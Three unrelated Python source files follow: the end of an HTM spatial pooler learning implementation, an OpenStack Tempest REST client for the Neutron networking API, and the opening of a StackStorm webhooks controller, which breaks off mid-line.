indicates the amount by which a synapse'perm permanence must be decremented. :param activity: the BSP'perm activity matrix (p. 4). This parameter is modified and returned. It is a dictionary with tuples (y, x) of HTM column coordinates as keys and deque (a queue implementation) instances as values. The queue for key [a, b] stores a 1 each iteration the the column [a, b] is active during the last 1000 iterations. :param overlap_sum: the BSP'perm overlapSum matrix (p. 4). This parameter is modified and returned. It is a dictionary with tuples (y, x) of HTM column coordinates as keys and deque (a queue implementation) instances as values. The queue for key [a, b] stores a 1 each time the overlap of the column [a, b] was above the minOverlap threshold during the last 1000 iterations. :param min_activity: the BSP'perm minActivity matrix (p. 4); an array min_activity of shape (columns.shape[0], columns.shape[1]), where each min_activity[a b] represents the calculated minActivity for the column [a, b]. :param boost: the BSP'perm boost matrix (pp. 3, 4). It is a matrix of shape (columns.shape[0], columns.shape[1]) :param b_inc: the BSP'perm bInc parameter (p. 4). A float that indicates the amount by which a column'perm boost must be incremented. :param p_mult: the BSP'perm pMult parameter (p. 4). A float that indicates the amount by which a synapse'perm permanence must be multiplied. :param connect_threshold: threshold over which a potential synapse is considered *connected*. All potential synapses start with a permanence value within 0.1 of this parameter. :param distances: a 4-dimensional array of the same shape as *columns*; each element distances[a, b, c, d] contains the euclidean distance from (a, b) to (c, d). :param b_max: boost threshold (p. 6). :return: a tuple (columns, synapse_modified). *columns* is the parameter of the same name, modified according to the BSP learning algorithm. *synapse_modified* is a boolean indicating whether any synapses were modified in the course of learning. """ # Assume no synapse will be modified. synapse_modified = False mean_input = np.nanmean(input_vector) # Store which synapses are connecter and which aren't. pre_col_matrix = ne.evaluate('columns >= connect_threshold') # For each active column [y, x] ... for _, _, syn_matrix in iter_columns(columns, active_matrix=active): # for each potential synapse [u, v] of [y, x] with permanence perm, # (NOTE: by definition, perm = syn_matrix[u, v]) for u, v, perm in iter_synapses(syn_matrix, only_potential=True): s = (u, v) if (input_vector[s] > mean_input and perm >= connect_threshold): syn_matrix[s] = min(perm + p_inc, 1) elif (input_vector[s] > mean_input and perm < connect_threshold): syn_matrix[s] = min(perm + p_inc, connect_threshold - p_inc) else: syn_matrix[s] = max(perm - p_dec, 0) # For each column [y, x] ... for y, x, syn_matrix in iter_columns(columns): c = (y, x) # if the activity of [y, x] over the last 1000 iterations was too low, if activity[c].sum() < min_activity[c]: # increment the boost by b_inc (in the paper this is done inside # the if clause in lines 14-15 of algorithm 3 in page 6), ... boost[c] += b_inc # if its boost is too high, ... if boost[c] > b_max: # define a function to filter all synapses with a permanence # value below the threshold, ... def filter_permanences(s): u, v, perm = s if perm < connect_threshold: return (perm, distances[c][u, v]) else: return -np.infty # reset the boost for column [y, x], ... boost[c] = 1 # select the disconnected synapse with the highest permanence, # choosing the nearest synapse in case of tie, ... max_syn = max(iter_synapses(syn_matrix), key=filter_permanences) max_s = max_syn[:2] # and set the selected synapse's permanence value to p_inc # above the threshold. syn_matrix[max_s] = connect_threshold + p_inc # Set synapse_modified to True if any synapse change from connected to # disconnected or vice-versa by this algorithm. if (pre_col_matrix != ne.evaluate('columns >= connect_threshold')).any(): synapse_modified = True # Return the columns array, with its synapses modified. return columns, synapse_modified def spatial_pooler(images, shape, p_connect=0.15, connect_threshold=0.2, p_inc=0.02, p_dec=0.02, b_inc=0.005, p_mult=0.01, min_activity_threshold=0.01, desired_activity_mult=0.05, b_max=4, max_iterations=10000, cycles_to_save=100, output_file=None): """ Implements the main BSP loop (p. 3). It goes continually through the images set until convergence. :param images: set of images to learn from. It is an array of shape (l, m, n) where (l, m) == (shape[0], shape[1]) and (l, m) == (shape[2], shape[3]) :param shape: the shape of the output array. It must have 4 components, and (shape[0], shape[1]) == (shape[2], shape[3]). :param p_connect: probability of the columns mapped to [i, j] to have a potential synapse to coordinates [k, l], for all i in shape[0], j in shape[1], k in shape[2], and l in shape[3]. :param connect_threshold: threshold over which a potential synapse is considered *connected*. All potential synapses start with a permanence value within 0.1 of this parameter. :param p_inc: the BSP'perm pInc parameter (p. 4). A float that indicates the amount by which a synapse'perm permanence must be incremented. :param p_dec: the BSP'perm pDec parameter (p. 4). A float that indicates the amount by which a synapse'perm permanence must be decremented. :param b_inc: the BSP'perm bInc parameter (p. 4). A float that indicates the amount by which a column'perm boost must be incremented. :param p_mult: the BSP'perm pMult parameter (p. 4). A float that indicates the amount by which a synapse'perm permanence must be multiplied. :param min_activity_threshold: the BSP's minActivityThreshold parameter (p. 4). :param desired_activity_mult: the BSP's desiredActivityMult parameter (p. 4). :param b_max: the ASP'perm bMax parameter (p. 6). A float that indicates the amount by which a synapse'perm permanence must be multiplied. :param max_iterations: an integer indicating the maximum number of runs through the set of images allowed. Pass None if no limit is desired. :param cycles_to_save: wait this number of iterations over the complete set of images before saving the columns to disk. :param output_file: file name used to save the pickled columns. :return: a matrix *columns* of shape *shape*, created and modified according to the BSP learning algorithm. """ # Initialize boost matrix. boost = np.ones(shape=shape[:2]) part_rbuffer = partial(RingBuffer, input_array=np.zeros(1000, dtype=np.bool), copy=True) # Initialize activity dictionary. activity = defaultdict(part_rbuffer) # Initialize columns and distances matrices. pprint("Initializing synapses ...") columns, distances = initialise_synapses(shape, p_connect, connect_threshold) pprint("Columns:") random_rows = np.random.randint(0, shape[0], 2) random_cols = np.random.randint(0, shape[1], 2) pprint(columns[random_rows, random_cols]) pprint("Distances:") pprint(distances[random_rows, random_cols]) # Calculate the inhibition_area parameter. pprint("Calculating inhibition area ...") inhibition_area = update_inhibition_area(columns, connect_threshold) pprint("Inhibition area: %s" % inhibition_area) # Calculate the desired activity in a inhibition zone. pprint("Calculating desired activity ...") desired_activity = desired_activity_mult * inhibition_area pprint("Desired activity: %s" % desired_activity) converged = False i = 0 # While synapses are modified and the maximum number of iterations is not # overstepped, ... pprint("Starting learning loop ...") start = datetime.now() while not converged and (max_iterations is None or i < max_iterations): # Initialize the synapses_modified array, assuming no synapses will be # modified. synapses_modified = np.zeros(shape=len(images), dtype=np.bool) # For each image *image*, with index *j* in the images set, ... for j, image, _ in read_input(images): # According to the paper (sic): # "minOverlap was dynamically set to be the product of the mean # pixel intensity of the current image and the mean number of # connected synapses for an individual column." # This leaves unclear exactly what is meant by "mean number of # connected synapses for an individual column"; it could be a # historical mean or a mean over all columns, here the latter was # chosen. mean_conn_synapses = (columns[columns > connect_threshold].size / (shape[2] * shape[3])) min_overlap = image.mean() * mean_conn_synapses # calculate the overlap of the columns with the image. # (this is a simple count of the number of its connected synapses # that are receiving active input (p. 3)), ... overlap = calculate_overlap(image, columns, min_overlap, connect_threshold, boost) # force sparsity by inhibiting columns, ... active, activity =\ inhibit_columns(columns, distances, inhibition_area, overlap, activity, desired_activity) # calculate the min_activity matrix, ... min_activity =\ calculate_min_activity(columns, active, distances, inhibition_area, activity, min_activity_threshold) # and finally, adapt the synapse's permanence values. columns, synapses_modified[j] =\ learn_synapse_connections(columns, active, image, p_inc, p_dec, activity, min_activity, boost, b_inc, p_mult, connect_threshold, distances, b_max) # Update the inhibition_area parameter. inhibition_area = update_inhibition_area(columns, connect_threshold) # Update the desired activity in a inhibition zone. desired_activity = desired_activity_mult * inhibition_area # Print a snapshot of the model state every 1000 images. if j % 1000 == 0: pprint("########## %sth image of %sth iteration ##########" % (j+1, i+1)) elapsed = datetime.now() - start elapsed_h = elapsed.total_seconds() // 3600 elapsed_m = (elapsed.total_seconds() // 60) % 60 elapsed_s = elapsed.seconds % 60 pprint("########## Elapsed time: %02d:%02d:%02d ##########" % (elapsed_h, elapsed_m, elapsed_s)) pprint("Overlap:") pprint(overlap[random_rows, random_cols]) pprint("Activity:") for l, key in enumerate(activity.iterkeys()): if l in random_rows: pprint(activity[key][-100:]) pprint("Active:") pprint(active[random_rows, random_cols]) pprint("Min activity:") pprint(min_activity[random_rows, random_cols]) pprint("Inhibition area: %s" % inhibition_area) pprint("Inhibition radius: %s" % (np.sqrt(inhibition_area/np.pi),)) pprint("Desired activity: %s" % desired_activity) pprint("Synapses modified: %s" % synapses_modified[j]) # Check if any synapses changed from connected to disconnected or # vice-versa in the last learning cycle. converged = test_for_convergence(synapses_modified) pprint("Iteration %s. Number of synapses modified: %s" % (i, synapses_modified.sum())) if i % cycles_to_save == 0 or converged: if output_file is not None: with open(output_file, 'wb') as fp: pickle.dump(columns, fp) # Increment iterations counter. i += 1 return columns if __name__ == '__main__': import sys from utils import load_images, extract_patches # Check whether the --output_file command line parameter was provided. output_file = '.' if '--output_file' in sys.argv: # Get the command line parameter value. arg_index = sys.argv.index('--output_file') output_file = sys.argv[arg_index + 1] else: sys.exit('The parameter --output_file is mandatory.') # Check whether the --images_path command line parameter was provided. images_path = '.' if '--images_path' in sys.argv: # Get the command line parameter value. arg_index = sys.argv.index('--images_path') images_path = sys.argv[arg_index + 1] # Check whether the --create_patches command line parameter was provided. create_patches = False if '--create_patches' in sys.argv: create_patches = True # Check whether the --patches_file command line parameter was provided. patches_file = None if '--patches_file' in sys.argv: # Get the command line parameter value. arg_index = sys.argv.index('--patches_file') patches_file = sys.argv[arg_index + 1] patches = None if patches_file is not None: # If the patches_file command line parameter was provided, # read it from disk. pprint("Reading patches file ...") with open(patches_file, 'rb') as fp: patches = pickle.load(fp) else: # If the patches_file command line parameter was not provided, # load the images from disk, ... pprint("Loading images ...") images, image_files = load_images(images_path, extensions=['.png'], img_shape=(256, 256)) if create_patches: # and if the --create_patches was provided generate the patches. pprint("Extracting patches ...") patches = extract_patches(images, patch_shape=(16, 16)) if patches_file is not None: pprint("Saving patches to disk ...") with open(patches_file, 'wb') as fp: pickle.dump(patches, fp) else: # or, if the --create_patches was not provided, use the images # themselves as the patches. patches = images # Finally, start the learning procedure. pprint("Starting training ...") columns = spatial_pooler(patches, shape=(16, 16, 16, 16), p_connect=0.1, connect_threshold=0.2, p_inc=0.0005, p_dec=0.0025, b_inc=0.005, p_mult=0.01, min_activity_threshold=0.01, desired_activity_mult=0.05, b_max=4, max_iterations=patches.shape[0], output_file=output_file)
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import json from tempest.common.rest_client import RestClient class NetworkClientJSON(RestClient): """ Tempest REST client for Neutron. Uses v2 of the Neutron API, since the V1 API has been removed from the code base. Implements create, delete, update, list and show for the basic Neutron abstractions (networks, sub-networks, routers, ports and floating IP): Implements add/remove interface to router using subnet ID / port ID It also implements list, show, update and reset for OpenStack Networking quotas """ def __init__(self, config, username, password, auth_url, tenant_name=None): super(NetworkClientJSON, self).__init__(config, username, password, auth_url, tenant_name) self.service = self.config.network.catalog_type self.version = '2.0' self.uri_prefix = "v%s" % (self.version) def list_networks(self): uri = '%s/networks' % (self.uri_prefix) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def create_network(self, name, **kwargs): post_body = {'network': kwargs} post_body['network']['name'] = name body = json.dumps(post_body) uri = '%s/networks' % (self.uri_prefix) resp, body = self.post(uri, headers=self.headers, body=body) body = json.loads(body) return resp, body def create_bulk_network(self, count, names): network_list = list() for i in range(count): network_list.append({'name': names[i]}) post_body = {'networks': network_list} body = json.dumps(post_body) uri = '%s/networks' % (self.uri_prefix) resp, body = self.post(uri, headers=self.headers, body=body) body = json.loads(body) return resp, body def show_network(self, uuid): uri = '%s/networks/%s' % (self.uri_prefix, uuid) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def delete_network(self, uuid): uri = '%s/networks/%s' % (self.uri_prefix, uuid) resp, body = self.delete(uri, self.headers) return resp, body def create_subnet(self, net_uuid, cidr, ip_version=4, **kwargs): post_body = {'subnet': kwargs} post_body['subnet']['ip_version'] = ip_version post_body['subnet']['network_id'] = net_uuid post_body['subnet']['cidr'] = cidr body = json.dumps(post_body) uri = '%s/subnets' % (self.uri_prefix) resp, body = self.post(uri, headers=self.headers, body=body) body = json.loads(body) return resp, body def delete_subnet(self, uuid): uri = '%s/subnets/%s' % (self.uri_prefix, uuid) resp, body = self.delete(uri, self.headers) return resp, body def list_subnets(self): uri = '%s/subnets' % (self.uri_prefix) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def show_subnet(self, uuid): uri = '%s/subnets/%s' % (self.uri_prefix, uuid) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def create_port(self, network_id, **kwargs): post_body = { 'port': { 'network_id': network_id, } } for key, val in kwargs.items(): post_body['port'][key] = val body = json.dumps(post_body) uri = '%s/ports' % (self.uri_prefix) resp, body = self.post(uri, headers=self.headers, body=body) body = json.loads(body) return resp, body def delete_port(self, port_id): uri = '%s/ports/%s' % (self.uri_prefix, port_id) resp, body = self.delete(uri, self.headers) return resp, body def list_ports(self, **filters): uri = '%s/ports' % (self.uri_prefix) filter_items = ["%s=%s" % (k, v) for (k, v) in filters.iteritems()] querystring = "&".join(filter_items) if querystring: uri = "%s?%s" % (uri, querystring) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def show_port(self, port_id): uri = '%s/ports/%s' % (self.uri_prefix, port_id) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def update_quotas(self, tenant_id, **kwargs): put_body = {'quota': kwargs} body = json.dumps(put_body) uri = '%s/quotas/%s' % (self.uri_prefix, tenant_id) resp, body = self.put(uri, body, self.headers) body = json.loads(body) return resp, body['quota'] def show_quotas(self, tenant_id): uri = '%s/quotas/%s' % (self.uri_prefix, tenant_id) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body['quota'] def reset_quotas(self, tenant_id): uri = '%s/quotas/%s' % (self.uri_prefix, tenant_id) resp, body = self.delete(uri, self.headers) return resp, body def list_quotas(self): uri = '%s/quotas' % (self.uri_prefix) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body['quotas'] def update_subnet(self, subnet_id, new_name): put_body = { 'subnet': { 'name': new_name, } } body = json.dumps(put_body) uri = '%s/subnets/%s' % (self.uri_prefix, subnet_id) resp, body = self.put(uri, body=body, headers=self.headers) body = json.loads(body) return resp, body def update_port(self, port_id, new_name): put_body = { 'port': { 'name': new_name, } } body = json.dumps(put_body) uri = '%s/ports/%s' % (self.uri_prefix, port_id) resp, body = self.put(uri, body=body, headers=self.headers) body = json.loads(body) return resp, body def update_network(self, network_id, new_name): put_body = { "network": { "name": new_name, } } body = json.dumps(put_body) uri = '%s/networks/%s' % (self.uri_prefix, network_id) resp, body = self.put(uri, body=body, headers=self.headers) body = json.loads(body) return resp, body def list_routers(self): uri = '%s/routers' % (self.uri_prefix) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def create_router(self, name, admin_state_up=True, **kwargs): post_body = {'router': kwargs} post_body['router']['name'] = name post_body['router']['admin_state_up'] = admin_state_up body = json.dumps(post_body) uri = '%s/routers' % (self.uri_prefix) resp, body = self.post(uri, headers=self.headers, body=body) body = json.loads(body) return resp, body def delete_router(self, router_id): uri = '%s/routers/%s' % (self.uri_prefix, router_id) resp, body = self.delete(uri, self.headers) return resp, body def show_router(self, router_id): uri = '%s/routers/%s' % (self.uri_prefix, router_id) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def _update_router(self, router_id, set_enable_snat, **kwargs): uri = '%s/routers/%s' % (self.uri_prefix, router_id) resp, body = self.get(uri, self.headers) body = json.loads(body) update_body = {} update_body['name'] = kwargs.get('name', body['router']['name']) update_body['admin_state_up'] = kwargs.get( 'admin_state_up', body['router']['admin_state_up']) cur_gw_info = body['router']['external_gateway_info'] if cur_gw_info and not set_enable_snat: cur_gw_info.pop('enable_snat', None) update_body['external_gateway_info'] = kwargs.get( 'external_gateway_info', body['router']['external_gateway_info']) update_body = dict(router=update_body) update_body = json.dumps(update_body) resp, body = self.put(uri, update_body, self.headers) body = json.loads(body) return resp, body def update_router(self, router_id, **kwargs): """Update a router leaving enable_snat to its default value.""" # If external_gateway_info contains enable_snat the request will fail # with 404 unless executed with admin client, and therefore we instruct # _update_router to not set this attribute # NOTE(salv-orlando): The above applies as long as Neutron's default # policy is to restrict enable_snat usage to admins only. return self._update_router(router_id, set_enable_snat=False, **kwargs) def update_router_with_snat_gw_info(self, router_id, **kwargs): """Update a router passing also the enable_snat attribute. This method must be execute with admin credentials, otherwise the API call will return a 404 error. """ return self._update_router(router_id, set_enable_snat=True, **kwargs) def add_router_interface_with_subnet_id(self, router_id, subnet_id): uri = '%s/routers/%s/add_router_interface' % (self.uri_prefix, router_id) update_body = {"subnet_id": subnet_id} update_body = json.dumps(update_body) resp, body = self.put(uri, update_body, self.headers) body = json.loads(body) return resp, body def add_router_interface_with_port_id(self, router_id, port_id): uri = '%s/routers/%s/add_router_interface' % (self.uri_prefix, router_id) update_body = {"port_id": port_id} update_body = json.dumps(update_body) resp, body = self.put(uri, update_body, self.headers) body = json.loads(body) return resp, body def remove_router_interface_with_subnet_id(self, router_id, subnet_id): uri = '%s/routers/%s/remove_router_interface' % (self.uri_prefix, router_id) update_body = {"subnet_id": subnet_id} update_body = json.dumps(update_body) resp, body = self.put(uri, update_body, self.headers) body = json.loads(body) return resp, body def remove_router_interface_with_port_id(self, router_id, port_id): uri = '%s/routers/%s/remove_router_interface' % (self.uri_prefix, router_id) update_body = {"port_id": port_id} update_body = json.dumps(update_body) resp, body = self.put(uri, update_body, self.headers) body = json.loads(body) return resp, body def create_floating_ip(self, ext_network_id, **kwargs): post_body = { 'floatingip': kwargs} post_body['floatingip']['floating_network_id'] = ext_network_id body = json.dumps(post_body) uri = '%s/floatingips' % (self.uri_prefix) resp, body = self.post(uri, headers=self.headers, body=body) body = json.loads(body) return resp, body def list_security_groups(self): uri = '%s/security-groups' % (self.uri_prefix) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def delete_security_group(self, secgroup_id): uri = '%s/security-groups/%s' % (self.uri_prefix, secgroup_id) resp, body = self.delete(uri, self.headers) return resp, body def create_security_group(self, name, **kwargs): post_body = { 'security_group': { 'name': name, } } for key, value in kwargs.iteritems(): post_body['security_group'][str(key)] = value body = json.dumps(post_body) uri = '%s/security-groups' % (self.uri_prefix) resp, body = self.post(uri, headers=self.headers, body=body) body = json.loads(body) return resp, body def show_floating_ip(self, floating_ip_id): uri = '%s/floatingips/%s' % (self.uri_prefix, floating_ip_id) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def show_security_group(self, secgroup_id): uri = '%s/security-groups/%s' % (self.uri_prefix, secgroup_id) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def list_floating_ips(self): uri = '%s/floatingips' % (self.uri_prefix) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def list_security_group_rules(self): uri = '%s/security-group-rules' % (self.uri_prefix) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def delete_floating_ip(self, floating_ip_id): uri = '%s/floatingips/%s' % (self.uri_prefix, floating_ip_id) resp, body = self.delete(uri, self.headers) return resp, body def update_floating_ip(self, floating_ip_id, **kwargs): post_body = { 'floatingip': kwargs} body = json.dumps(post_body) uri = '%s/floatingips/%s' % (self.uri_prefix, floating_ip_id) resp, body = self.put(uri, headers=self.headers, body=body) body = json.loads(body) return resp, body def create_security_group_rule(self, secgroup_id, direction='ingress', **kwargs): post_body = { 'security_group_rule': { 'direction': direction, 'security_group_id': secgroup_id } } for key, value in kwargs.iteritems(): post_body['security_group_rule'][str(key)] = value body = json.dumps(post_body) uri = '%s/security-group-rules' % (self.uri_prefix) resp, body = self.post(uri, headers=self.headers, body=body) body = json.loads(body) return resp, body def create_bulk_subnet(self, subnet_list): post_body = {'subnets': subnet_list} body = json.dumps(post_body) uri = '%s/subnets' % (self.uri_prefix) resp, body = self.post(uri, headers=self.headers, body=body) body = json.loads(body) return resp, body def delete_security_group_rule(self, rule_id): uri = '%s/security-group-rules/%s' % (self.uri_prefix, rule_id) resp, body = self.delete(uri, self.headers) return resp, body def show_security_group_rule(self, rule_id): uri = '%s/security-group-rules/%s' % (self.uri_prefix, rule_id) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def create_bulk_port(self, port_list): post_body = {'ports': port_list} body = json.dumps(post_body) uri = '%s/ports' % (self.uri_prefix) resp, body = self.post(uri, headers=self.headers, body=body) body = json.loads(body) return resp, body def list_vips(self): uri = '%s/lb/vips' % (self.uri_prefix) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def create_vip(self, name, protocol, protocol_port, subnet_id, pool_id): post_body = { "vip": { "protocol": protocol, "name": name, "subnet_id": subnet_id, "pool_id": pool_id, "protocol_port": protocol_port } } body = json.dumps(post_body) uri = '%s/lb/vips' % (self.uri_prefix) resp, body = self.post(uri, headers=self.headers, body=body) body = json.loads(body) return resp, body def create_pool(self, name, lb_method, protocol, subnet_id): post_body = { "pool": { "protocol": protocol, "name": name, "subnet_id": subnet_id, "lb_method": lb_method } } body = json.dumps(post_body) uri = '%s/lb/pools' % (self.uri_prefix) resp, body = self.post(uri, headers=self.headers, body=body) body = json.loads(body) return resp, body def show_vip(self, uuid): uri = '%s/lb/vips/%s' % (self.uri_prefix, uuid) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def delete_vip(self, uuid): uri = '%s/lb/vips/%s' % (self.uri_prefix, uuid) resp, body = self.delete(uri, self.headers) return resp, body def delete_pool(self, uuid): uri = '%s/lb/pools/%s' % (self.uri_prefix, uuid) resp, body = self.delete(uri, self.headers) return resp, body def update_vip(self, vip_id, new_name): put_body = { "vip": { "name": new_name, } } body = json.dumps(put_body) uri = '%s/lb/vips/%s' % (self.uri_prefix, vip_id) resp, body = self.put(uri, body=body, headers=self.headers) body = json.loads(body) return resp, body def update_pool(self, pool_id, new_name): put_body = { "pool": { "name": new_name, } } body = json.dumps(put_body) uri = '%s/lb/pools/%s' % (self.uri_prefix, pool_id) resp, body = self.put(uri, body=body, headers=self.headers) body = json.loads(body) return resp, body def list_pools(self): uri = '%s/lb/pools' % (self.uri_prefix) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def show_pool(self, uuid): uri = '%s/lb/pools/%s' % (self.uri_prefix, uuid) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def list_members(self): uri = '%s/lb/members' % (self.uri_prefix) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def create_member(self, address, protocol_port, pool_id): post_body = { "member": { "protocol_port": protocol_port, "pool_id": pool_id, "address": address } } body = json.dumps(post_body) uri = '%s/lb/members' % (self.uri_prefix) resp, body = self.post(uri, headers=self.headers, body=body) body = json.loads(body) return resp, body def show_member(self, uuid): uri = '%s/lb/members/%s' % (self.uri_prefix, uuid) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def delete_member(self, uuid): uri = '%s/lb/members/%s' % (self.uri_prefix, uuid) resp, body = self.delete(uri, self.headers) return resp, body def update_member(self, admin_state_up, member_id): put_body = { "member": { "admin_state_up": admin_state_up } } body = json.dumps(put_body) uri = '%s/lb/members/%s' % (self.uri_prefix, member_id) resp, body = self.put(uri, body=body, headers=self.headers) body = json.loads(body) return resp, body def list_health_monitors(self): uri = '%s/lb/health_monitors' % (self.uri_prefix) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def create_health_monitor(self, delay, max_retries, Type, timeout): post_body = { "health_monitor": { "delay": delay, "max_retries": max_retries, "type": Type, "timeout": timeout } } body = json.dumps(post_body) uri = '%s/lb/health_monitors' % (self.uri_prefix) resp, body = self.post(uri, headers=self.headers, body=body) body = json.loads(body) return resp, body def show_health_monitor(self, uuid): uri = '%s/lb/health_monitors/%s' % (self.uri_prefix, uuid) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def delete_health_monitor(self, uuid): uri = '%s/lb/health_monitors/%s' % (self.uri_prefix, uuid) resp, body = self.delete(uri, self.headers) return resp, body def update_health_monitor(self, admin_state_up, uuid): put_body = { "health_monitor": { "admin_state_up": admin_state_up } } body = json.dumps(put_body) uri = '%s/lb/health_monitors/%s' % (self.uri_prefix, uuid) resp, body = self.put(uri, body=body, headers=self.headers) body = json.loads(body) return resp, body def associate_health_monitor_with_pool(self, health_monitor_id, pool_id): post_body = { "health_monitor": { "id": health_monitor_id, } } body = json.dumps(post_body) uri = '%s/lb/pools/%s/health_monitors' % (self.uri_prefix, pool_id) resp, body = self.post(uri, headers=self.headers, body=body) body = json.loads(body) return resp, body def disassociate_health_monitor_with_pool(self, health_monitor_id, pool_id): uri = '%s/lb/pools/%s/health_monitors/%s' % (self.uri_prefix, pool_id, health_monitor_id) resp, body = self.delete(uri, headers=self.headers) return resp, body def list_extensions(self): uri = '%s/extensions' % (self.uri_prefix) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def show_extension_details(self, ext_alias): uri = '%s/extensions/%s' % (self.uri_prefix, ext_alias) resp, body = self.get(uri, headers=self.headers) body = json.loads(body) return resp, body def list_vpn_services(self): uri = '%s/vpn/vpnservices' % (self.uri_prefix) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def create_vpn_service(self, subnet_id, router_id, **kwargs): post_body = { "vpnservice": { "subnet_id": subnet_id, "router_id": router_id } } for key, val in kwargs.items(): post_body['vpnservice'][key] = val body = json.dumps(post_body) uri = '%s/vpn/vpnservices' % (self.uri_prefix) resp, body = self.post(uri, headers=self.headers, body=body) body = json.loads(body) return resp, body def show_vpn_service(self, uuid): uri = '%s/vpn/vpnservices/%s' % (self.uri_prefix, uuid) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def delete_vpn_service(self, uuid): uri = '%s/vpn/vpnservices/%s' % (self.uri_prefix, uuid) resp, body = self.delete(uri, self.headers) return resp, body def update_vpn_service(self, uuid, description): put_body = { "vpnservice": { "description": description } } body = json.dumps(put_body) uri = '%s/vpn/vpnservices/%s' % (self.uri_prefix, uuid) resp, body = self.put(uri, body=body, headers=self.headers) body = json.loads(body) return resp, body def list_router_interfaces(self, uuid): uri = '%s/ports?device_id=%s' % (self.uri_prefix, uuid) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def list_agents(self): uri = '%s/agents' % self.uri_prefix resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def list_routers_on_l3_agent(self, agent_id): uri = '%s/agents/%s/l3-routers' % (self.uri_prefix, agent_id) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def list_l3_agents_hosting_router(self, router_id): uri = '%s/routers/%s/l3-agents' % (self.uri_prefix, router_id) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def list_service_providers(self): uri = '%s/service-providers' % self.uri_prefix resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body
# Licensed to the StackStorm, Inc ('StackStorm') under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. try: import simplejson as json except ImportError: import json import six import pecan import uuid from pecan import abort from pecan.rest import RestController from six.moves.urllib import parse as urlparse # pylint: disable=import-error urljoin = urlparse.urljoin from st2common import log as logging from st2common.constants.triggers import WEBHOOK_TRIGGER_TYPES from st2common.models.api.base import jsexpose from st2common.models.api.trace import TraceContext from st2common.models.api.trigger import TriggerAPI import st2common.services.triggers as trigger_service from st2common.services.triggerwatcher import TriggerWatcher from st2common.transport.reactor import TriggerDispatcher from st2common.util.http import parse_content_type_header from st2common.rbac.types import PermissionType from st2common.rbac.decorators import request_user_has_webhook_permission http_client = six.moves.http_client LOG = logging.getLogger(__name__) TRACE_TAG_HEADER = 'St2-Trace-Tag' class HooksHolder(object): """ Maintains a hook to Trigger mapping. """ def __init__(self): self._triggers_by_hook = {} def __contains__(self, key): return key in self._triggers_by_hook def add_hook(self, hook, trigger): if hook not in self._triggers_by_hook: self._triggers_by_hook[hook] = [] self._triggers_by_hook[hook].append(trigger) def remove_hook(self, hook, trigger): if hook not in self._triggers_by_hook: return False remove_index = -1 for idx, item in enumerate(self._triggers_by_hook[hook]): if item['id'] == trigger['id']: remove_index = idx break if remove_index < 0: return False self._triggers_by_hook[hook].pop(remove_index) if not self._triggers_by_hook[hook]: del self._triggers_by_hook[hook] return True def get_triggers_for_hook(self, hook): return self._triggers_by_hook.get(hook, []) def get_all(self): triggers = [] for values in six.itervalues(self._triggers_by_hook): triggers.extend(values) return triggers class WebhooksController(RestController): def __init__(self, *args, **kwargs): super(WebhooksController, self).__init__(*args, **kwargs) self._hooks = HooksHolder() self._base_url = '/webhooks/' self._trigger_types = WEBHOOK_TRIGGER_TYPES.keys() self._trigger_dispatcher = TriggerDispatcher(LOG) queue_suffix = self.__class__.__name__ self._trigger_watcher = TriggerWatcher(create_handler=self._handle_create_trigger, update_handler=self._handle_update_trigger, delete_handler=self._handle_delete_trigger, trigger_types=self._trigger_types, queue_suffix=queue_suffix, exclusive=True) self._trigger_watcher.start() self._register_webhook_trigger_types() @jsexpose() def get_all(self): # Return only the hooks known by this controller. return self._hooks.get_all() @jsexpose() def get_one(self, name): triggers = self._hooks.get_triggers_for_hook(name) if not triggers: abort(http_client.NOT_FOUND) return # For demonstration purpose return 1st return triggers[0] @request_user_has_webhook_permission(permission_type=PermissionType.WEBHOOK_SEND) @jsexpose(arg_types=[str], status_code=http_client.ACCEPTED) def post(self, *args, **kwargs): hook = '/'.join(args) # TODO: There must be a better way to do this. # Note: For backward compatibility reasons we default to application/json if 